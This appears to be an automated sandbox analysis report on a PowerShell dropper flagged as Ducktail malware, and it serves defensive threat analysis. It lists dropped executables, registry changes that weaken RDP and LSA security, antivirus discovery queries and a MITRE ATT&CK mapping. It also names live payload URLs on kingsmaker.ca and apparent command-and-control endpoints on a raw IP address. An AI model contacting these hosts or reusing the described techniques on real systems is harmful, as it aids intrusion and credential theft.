Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation

Source: C:\Windows\Temp\svczHost.exe

Code function: 12_2_00007FF7FA6EBFE0 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

12_2_00007FF7FA6EBFE0

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Modifies security policies related information

Source: C:\Windows\Temp\myRdpService.exe

Registry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa DisableRestrictedAdmin

Source: powershell.exe, 00000000.00000002.3649796137.0000015FEC761000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.3646404464.0000015FEC01C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.4467052107.00000223E568F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: powershell.exe, 00000000.00000002.3649796137.0000015FEC6E0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: amFiles%\Windows Defender\MsMpeng.exe

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - Root\SecurityCenter2 : select * from AntivirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - Root\SecurityCenter2 : select * from AntivirusProduct

Stealing of Sensitive Information

Yara detected Ducktail

Source: Yara match	File source: Process Memory Space: svczHost.exe PID: 3468, type: MEMORYSTR
Source: Yara match	File source: amsi64_7088.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 8976, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7088, type: MEMORYSTR

Remote Access Functionality

Yara detected Ducktail

Source: Yara match	File source: Process Memory Space: svczHost.exe PID: 3468, type: MEMORYSTR
Source: Yara match	File source: amsi64_7088.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 8976, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7088, type: MEMORYSTR

Allows multiple concurrent remote connection

Source: C:\Windows\Temp\myRdpService.exe

Registry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server fSingleSessionPerUser

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	431 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	OS Credential Dumping	1 System Time Discovery	1 Remote Desktop Protocol	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	11 Windows Service	11 Windows Service	1 Deobfuscate/Decode Files or Information	LSASS Memory	2 File and Directory Discovery	Remote Desktop Protocol	Data from Removable Media	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Service Execution	Logon Script (Windows)	11 Process Injection	1 Obfuscated Files or Information	Security Account Manager	125 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	11 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	4 PowerShell	Login Hook	Login Hook	1 Software Packing	NTDS	531 Security Software Discovery	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 Process Discovery	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 File Deletion	Cached Domain Credentials	341 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Masquerading	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Modify Registry	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	341 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	11 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
kingsmaker_4.ca.ps1	100%	Avira	TR/PShell.Dldr.VPAL
kingsmaker_4.ca.ps1	16%	ReversingLabs	Script-PowerShell.Trojan.Boxter

Dropped Files

Source	Detection	Scanner	Label
C:\Windows\Temp\svczHost.exe	100%	Avira	TR/AVI.Agent.izors
C:\Windows\Temp\myRdpService.exe	5%	ReversingLabs
C:\Windows\Temp\svczHost.exe	67%	ReversingLabs	Win64.Trojan.Generic

Source	Detection	Scanner	Label
http://html4/loose.dtd	0%	Avira URL Cloud	safe
http://www.microsoft.co	0%	Avira URL Cloud	safe
https://kingsmaker.ca/file2/31b8a1b5c89fe194298b8a9855e2443860920f3b00d19a946f931f7c332bd239766e1de8	0%	Avira URL Cloud	safe
https://kingsmaker.ca/4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b66d3f1253c06c3f3	0%	Avira URL Cloud	safe
https://kingsmaker.ca/4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b663ea0555ae9c0d6	0%	Avira URL Cloud	safe
https://kingsmaker.ca/4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b6645a53d59434ce34edb9a83c7f16af980	0%	Avira URL Cloud	safe
http://kingsmaker.ca:443/x	0%	Avira URL Cloud	safe
https://kingsmaker.ca/StaticFile/RdpService/52vice	0%	Avira URL Cloud	safe
https://kingsmaker.ca/StaticFile/RdpService/52h	0%	Avira URL Cloud	safe
https://go.microsoft.co	0%	Avira URL Cloud	safe
http://.css	0%	Avira URL Cloud	safe
https://kingsmaker.ca/4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b663bb648db58ef92	0%	Avira URL Cloud	safe
https://kingsmaker.ca	0%	Avira URL Cloud	safe
https://kingsmaker.ca/4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b66d3f1253c06c3f32eac3615742d73a5eb	0%	Avira URL Cloud	safe
https://kingsmaker.ca/StaticFile/RdpService/52	0%	Avira URL Cloud	safe
https://kingsmaker.ca/file3/f4c66a2f2c057f3b06250f3211c5a32657d9f73187a74ad9a0c73befa87bed5adaa1b59e	0%	Avira URL Cloud	safe
https://kingsmaker.ca/StaticFile/TermServiceTryRun/46	0%	Avira URL Cloud	safe
https://kingsmaker.ca/4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b6645a53d59434ce3	0%	Avira URL Cloud	safe
https://kingsmaker.ca/4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b663ea0555ae9c0d65b965f4e05b0696583	0%	Avira URL Cloud	safe
https://kingsmaker.ca/file2/2db1653a19d9e7820417a355a5bebd72b81f7e460fa70a5a1edfbf43f5b246051372de1d	0%	Avira URL Cloud	safe
https://kingsmaker.ca/4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b663bb648db58ef92bd3c982ad93b9ec563	0%	Avira URL Cloud	safe
http://.jpg	0%	Avira URL Cloud	safe
https://kingsmaker.ca/file2/37e2a576781f60eaea55e379be6ae0077641b39f5907924d8524241e29b7a53a613b3d37	0%	Avira URL Cloud	safe
https://ocsp.quovadisoffshore.com0	0%	Avira URL Cloud	safe
https://kingsmaker.ca/file2/1cbf3117c11b4baa44d1af2ed672d3f7e682f880ba2af6da9ab49b05b6edeb6dea5522ed	0%	Avira URL Cloud	safe
https://kingsmaker.ca/file3/f4c66a2f2c057f3b06250f3211c5a32657d9f73187a74ad9a0c73befa87bed5adaa1b59ea3fe07e54381481ca0bece87f5a691b18216ec8f663043055b37a6c8d7a59731af4b6e1340bfd787088106580f90f257aa865ae7b57e00e4873a697e/Windows%20Defender/16/16/user/209	0%	Avira URL Cloud	safe
http://23.88.71.29:8000/api/registry	0%	Avira URL Cloud	safe
http://pesterbdd.com/images/Pester.png	0%	Avira URL Cloud	safe
https://kingsmaker.ca/file2/30bb492ec87899a2b4a8fa5c9eeec46957553fd4ccfb234669d52f6f2a278556703b98ac	0%	Avira URL Cloud	safe
https://kingsmaker.ca/file2/31b8a1b5c89fe194298b8a9855e2443860920f3b00d19a946f931f7c332bd239766e1de8c7b2f19233540c7f291919f9c9191eff7a5de7868f190137bd7c2f225e9653c0a8361473c2464503478c32210e436919ed4dab25f52021847773e83d150bf92182d21b4dc33f01eee91ea1fa	0%	Avira URL Cloud	safe
http://pesterbdd.com/images/Pester.pngh	0%	Avira URL Cloud	safe
https://go.micro	0%	Avira URL Cloud	safe
https://kingsmaker.ca/file2/30bb492ec87899a2b4a8fa5c9eeec46957553fd4ccfb234669d52f6f2a278556703b98ace61ec66f52d29b28a8a4a890956d54d1d9e24579c740190b8799b1b67a5f4a6dff13c00dd57d89558c4a1e3705f0cd3f182dd3fb5270007203188fb6	0%	Avira URL Cloud	safe
http://23.88.71.29:8000/command/ws	0%	Avira URL Cloud	safe
https://kingsmaker.ca/file2/37e2a576781f60eaea55e379be6ae0077641b39f5907924d8524241e29b7a53a613b3d37f90e005e11b96d6117629046990c1df79aa9735289308c1b2fa9edeea4dc5fe5a09bf9b2773eeaf90950b696fe10cc9db3745b5151e4b000a791213cf93f25070f589b40fd3e39c4a18edad2	0%	Avira URL Cloud	safe
http://23.88.71.29:8000/client/ws	0%	Avira URL Cloud	safe
https://kingsmaker.ca/file2/1cbf3117c11b4baa44d1af2ed672d3f7e682f880ba2af6da9ab49b05b6edeb6dea5522edb4c2cc6c8aa8275b28d356e62b21287f073b49fa8071c3b9b230e0be0956bdede2a75925f23344959b9fe0fd9f829d94ffeee7dfe68b77418c356c1d95c4ddba34383a8308b2f4fdd59f7367	0%	Avira URL Cloud	safe
http://crl.microsof/crl/products/MicTimStaPCA_2010-07-01.crl0Z	0%	Avira URL Cloud	safe
http://crl.mi	0%	Avira URL Cloud	safe
https://kingsmaker.ca/file2/15d47d61496bbc5686d7406c0812dea52edfae361c42a72b85312aef81a346647d70b9be53bdebcdef5aacc13bbe01d56c85c91fad8c9b5e4884b741db2ee8f3a341e996a09fa3ade76a4e05f7f0974e4b6acbc75d0f6c645f96d06ea4d04590f12a7ca8a7453339c787d192c681aca6	0%	Avira URL Cloud	safe
https://kingsmaker.ca/file2/15d47d61496bbc5686d7406c0812dea52edfae361c42a72b85312aef81a346647d70b9be	0%	Avira URL Cloud	safe
http://crl.microsof	0%	Avira URL Cloud	safe
http://crl.microQI	0%	Avira URL Cloud	safe
http://www.quovadis.bm0	0%	Avira URL Cloud	safe
http://crl.v	0%	Avira URL Cloud	safe
http://crl.microsoft.c	0%	Avira URL Cloud	safe
http://23.88.71.29:8000/api/registry/upload/29b7a8f8d9967ca4c3166269aa4de757	0%	Avira URL Cloud	safe
https://oneget.org	0%	Avira URL Cloud	safe
http://kingsmaker.ca/api/check	0%	Avira URL Cloud	safe
http://pesterbdd.com/images/Pester.pngXz	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
kingsmaker.ca	172.67.179.67	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://kingsmaker.ca/4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b6645a53d59434ce34edb9a83c7f16af980	false	Avira URL Cloud: safe	unknown
https://kingsmaker.ca/4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b66d3f1253c06c3f32eac3615742d73a5eb	false	Avira URL Cloud: safe	unknown
https://kingsmaker.ca/4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b663ea0555ae9c0d65b965f4e05b0696583	false	Avira URL Cloud: safe	unknown
https://kingsmaker.ca/StaticFile/TermServiceTryRun/46	false	Avira URL Cloud: safe	unknown
https://kingsmaker.ca/StaticFile/RdpService/52	false	Avira URL Cloud: safe	unknown
https://kingsmaker.ca/4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b663bb648db58ef92bd3c982ad93b9ec563	false	Avira URL Cloud: safe	unknown
http://23.88.71.29:8000/api/registry	false	Avira URL Cloud: safe	unknown
https://kingsmaker.ca/file3/f4c66a2f2c057f3b06250f3211c5a32657d9f73187a74ad9a0c73befa87bed5adaa1b59ea3fe07e54381481ca0bece87f5a691b18216ec8f663043055b37a6c8d7a59731af4b6e1340bfd787088106580f90f257aa865ae7b57e00e4873a697e/Windows%20Defender/16/16/user/209	false	Avira URL Cloud: safe	unknown
https://kingsmaker.ca/file2/31b8a1b5c89fe194298b8a9855e2443860920f3b00d19a946f931f7c332bd239766e1de8c7b2f19233540c7f291919f9c9191eff7a5de7868f190137bd7c2f225e9653c0a8361473c2464503478c32210e436919ed4dab25f52021847773e83d150bf92182d21b4dc33f01eee91ea1fa	false	Avira URL Cloud: safe	unknown
http://23.88.71.29:8000/command/ws	false	Avira URL Cloud: safe	unknown
https://kingsmaker.ca/file2/30bb492ec87899a2b4a8fa5c9eeec46957553fd4ccfb234669d52f6f2a278556703b98ace61ec66f52d29b28a8a4a890956d54d1d9e24579c740190b8799b1b67a5f4a6dff13c00dd57d89558c4a1e3705f0cd3f182dd3fb5270007203188fb6	false	Avira URL Cloud: safe	unknown
https://kingsmaker.ca/file2/37e2a576781f60eaea55e379be6ae0077641b39f5907924d8524241e29b7a53a613b3d37f90e005e11b96d6117629046990c1df79aa9735289308c1b2fa9edeea4dc5fe5a09bf9b2773eeaf90950b696fe10cc9db3745b5151e4b000a791213cf93f25070f589b40fd3e39c4a18edad2	false	Avira URL Cloud: safe	unknown
https://kingsmaker.ca/file2/1cbf3117c11b4baa44d1af2ed672d3f7e682f880ba2af6da9ab49b05b6edeb6dea5522edb4c2cc6c8aa8275b28d356e62b21287f073b49fa8071c3b9b230e0be0956bdede2a75925f23344959b9fe0fd9f829d94ffeee7dfe68b77418c356c1d95c4ddba34383a8308b2f4fdd59f7367	false	Avira URL Cloud: safe	unknown
http://23.88.71.29:8000/client/ws	false	Avira URL Cloud: safe	unknown
https://kingsmaker.ca/file2/15d47d61496bbc5686d7406c0812dea52edfae361c42a72b85312aef81a346647d70b9be53bdebcdef5aacc13bbe01d56c85c91fad8c9b5e4884b741db2ee8f3a341e996a09fa3ade76a4e05f7f0974e4b6acbc75d0f6c645f96d06ea4d04590f12a7ca8a7453339c787d192c681aca6	false	Avira URL Cloud: safe	unknown
http://kingsmaker.ca/api/check	false	Avira URL Cloud: safe	unknown
http://23.88.71.29:8000/api/registry/upload/29b7a8f8d9967ca4c3166269aa4de757	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://html4/loose.dtd	powershell.exe, 00000008.00000002.4319253309.00000223DDCA0000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 0000000C.00000000.3813098421.00007FF7FAD3A000.00000002.00000001.01000000.0000000A.sdmp, svczHost.exe, 0000000C.00000002.4735951323.000002C4B1346000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://kingsmaker.ca/4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b66d3f1253c06c3f3	powershell.exe, 00000000.00000002.3608263403.0000015F80673000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://go.microsoft.co	powershell.exe, 00000010.00000002.4136909303.000002AAEBB18000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://kingsmaker.ca/4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b663ea0555ae9c0d6	powershell.exe, 00000000.00000002.3608263403.0000015F806E9000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/nativeaot-c	svczHost.exe, myRdpService.exe	false		high
https://kingsmaker.ca/StaticFile/RdpService/52vice	svczHost.exe, 0000000C.00000002.4734447817.000002C4B0093000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://kingsmaker.ca/file2/31b8a1b5c89fe194298b8a9855e2443860920f3b00d19a946f931f7c332bd239766e1de8	powershell.exe, 00000004.00000002.3512132506.000002B480269000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.microsoft.co	powershell.exe, 00000010.00000002.4147110154.000002AAEBE44000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/License	powershell.exe, 00000014.00000002.4043493845.0000024E5BBA7000.00000004.00000800.00020000.00000000.sdmp	false		high
https://kingsmaker.ca/StaticFile/RdpService/52h	svczHost.exe, 0000000C.00000002.4734447817.000002C4B00A8000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://kingsmaker.ca:443/x	svczHost.exe, 0000000C.00000002.4734447817.000002C4B00BD000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 0000000C.00000002.4734447817.000002C4B00A8000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://kingsmaker.ca	powershell.exe, 00000000.00000002.3608263403.0000015F8022B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3512132506.000002B4805C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3831537178.00000223CD5C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3831537178.00000223CEA7E000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://.css	powershell.exe, 00000008.00000002.4319253309.00000223DDCA0000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 0000000C.00000000.3813098421.00007FF7FAD3A000.00000002.00000001.01000000.0000000A.sdmp, svczHost.exe, 0000000C.00000002.4735951323.000002C4B1346000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://kingsmaker.ca/4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b663bb648db58ef92	powershell.exe, 00000000.00000002.3608263403.0000015F805BE000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/dotnet/runtime	powershell.exe, 00000008.00000002.4319253309.00000223DD4F6000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 0000000C.00000002.4741722082.00007FF7FAC21000.00000002.00000001.01000000.0000000A.sdmp, svczHost.exe, 0000000C.00000000.3813098421.00007FF7FAC21000.00000002.00000001.01000000.0000000A.sdmp, svczHost.exe, 0000000C.00000002.4735951323.000002C4B0A48000.00000004.00001000.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysidY	powershell.exe, 00000008.00000002.4319253309.00000223DDCA0000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 0000000C.00000000.3813098421.00007FF7FAD3A000.00000002.00000001.01000000.0000000A.sdmp, svczHost.exe, 0000000C.00000002.4735951323.000002C4B1346000.00000004.00001000.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid	svczHost.exe, svczHost.exe, 0000000C.00000002.4741339369.00007FF7FAAAF000.00000004.00000001.01000000.0000000A.sdmp, myRdpService.exe	false		high
https://aka.ms/dotnet-warnings/	powershell.exe, 00000008.00000002.4319253309.00000223DDCA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.4319253309.00000223DD4F6000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, svczHost.exe, 0000000C.00000000.3813098421.00007FF7FAD3A000.00000002.00000001.01000000.0000000A.sdmp, svczHost.exe, 0000000C.00000002.4735951323.000002C4B1346000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 0000000C.00000002.4741722082.00007FF7FAC21000.00000002.00000001.01000000.0000000A.sdmp, svczHost.exe, 0000000C.00000000.3813098421.00007FF7FAC21000.00000002.00000001.01000000.0000000A.sdmp, svczHost.exe, 0000000C.00000002.4741339369.00007FF7FAAAF000.00000004.00000001.01000000.0000000A.sdmp, svczHost.exe, 0000000C.00000002.4735951323.000002C4B0A48000.00000004.00001000.00020000.00000000.sdmp, myRdpService.exe	false		high
https://kingsmaker.ca/file3/f4c66a2f2c057f3b06250f3211c5a32657d9f73187a74ad9a0c73befa87bed5adaa1b59e	powershell.exe, 00000000.00000002.3608263403.0000015F8022B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://kingsmaker.ca/file2/2db1653a19d9e7820417a355a5bebd72b81f7e460fa70a5a1edfbf43f5b246051372de1d	powershell.exe, 00000000.00000002.3608263403.0000015F806E9000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/nativeaot-compatibility	myRdpService.exe	false		high
https://kingsmaker.ca/4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b6645a53d59434ce3	powershell.exe, 00000008.00000002.3831537178.00000223CD5FD000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/	powershell.exe, 00000014.00000002.4043493845.0000024E5BBA7000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000000.00000002.3636123689.0000015F9007A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3512132506.000002B481648000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3528495441.000002B49007B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.4319253309.00000223DD26D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.4104980578.000002AAE3A57000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.4104980578.000002AAE3B99000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.3863965405.000002AAD4E2F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.4043493845.0000024E5BBA7000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/Pester/PesterXz	powershell.exe, 00000000.00000002.3608263403.0000015F8022B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3512132506.000002B480269000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3831537178.00000223CD41E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.3863965405.000002AAD3C0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.3844549504.0000024E4BD5B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ocsp.quovadisoffshore.com0	powershell.exe, 00000000.00000002.3644439665.0000015FEBCBD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3533295106.000002B4FAF70000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.4436671344.00000223E52D4000.00000004.00000020.00020000.00000000.sdmp, svczHost.exe, 0000000C.00000002.4740236160.0000030543F00000.00000004.00000020.00020000.00000000.sdmp, svczHost.exe, 0000000C.00000002.4732861913.000002C4ACD38000.00000004.00000020.00020000.00000000.sdmp, svczHost.exe, 0000000C.00000002.4732861913.000002C4ACCF0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.4136909303.000002AAEBB18000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.4147110154.000002AAEBE44000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000000.00000002.3608263403.0000015F80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3512132506.000002B480001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.4319253309.00000223DDCA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3831537178.00000223CD1F1000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, svczHost.exe, 0000000C.00000000.3813098421.00007FF7FAD3A000.00000002.00000001.01000000.0000000A.sdmp, svczHost.exe, 0000000C.00000002.4735951323.000002C4B1346000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 0000000C.00000002.4741339369.00007FF7FAAAF000.00000004.00000001.01000000.0000000A.sdmp, powershell.exe, 00000010.00000002.3863965405.000002AAD39E1000.00000004.00000800.00020000.00000000.sdmp, myRdpService.exe	false		high
http://.jpg	powershell.exe, 00000008.00000002.4319253309.00000223DDCA0000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 0000000C.00000000.3813098421.00007FF7FAD3A000.00000002.00000001.01000000.0000000A.sdmp, svczHost.exe, 0000000C.00000002.4735951323.000002C4B1346000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://kingsmaker.ca/file2/37e2a576781f60eaea55e379be6ae0077641b39f5907924d8524241e29b7a53a613b3d37	powershell.exe, 00000008.00000002.3831537178.00000223CD41E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3831537178.00000223CD1F1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://kingsmaker.ca/file2/1cbf3117c11b4baa44d1af2ed672d3f7e682f880ba2af6da9ab49b05b6edeb6dea5522ed	powershell.exe, 00000000.00000002.3608263403.0000015F805BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.3608263403.0000015F8062D000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://nuget.org/NuGet.exe	powershell.exe, 00000000.00000002.3636123689.0000015F9007A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.3636123689.0000015F9021D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3512132506.000002B481648000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3528495441.000002B49007B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.4319253309.00000223DD26D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.4104980578.000002AAE3A57000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.4104980578.000002AAE3B99000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.3863965405.000002AAD4E2F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.4043493845.0000024E5BBA7000.00000004.00000800.00020000.00000000.sdmp	false		high
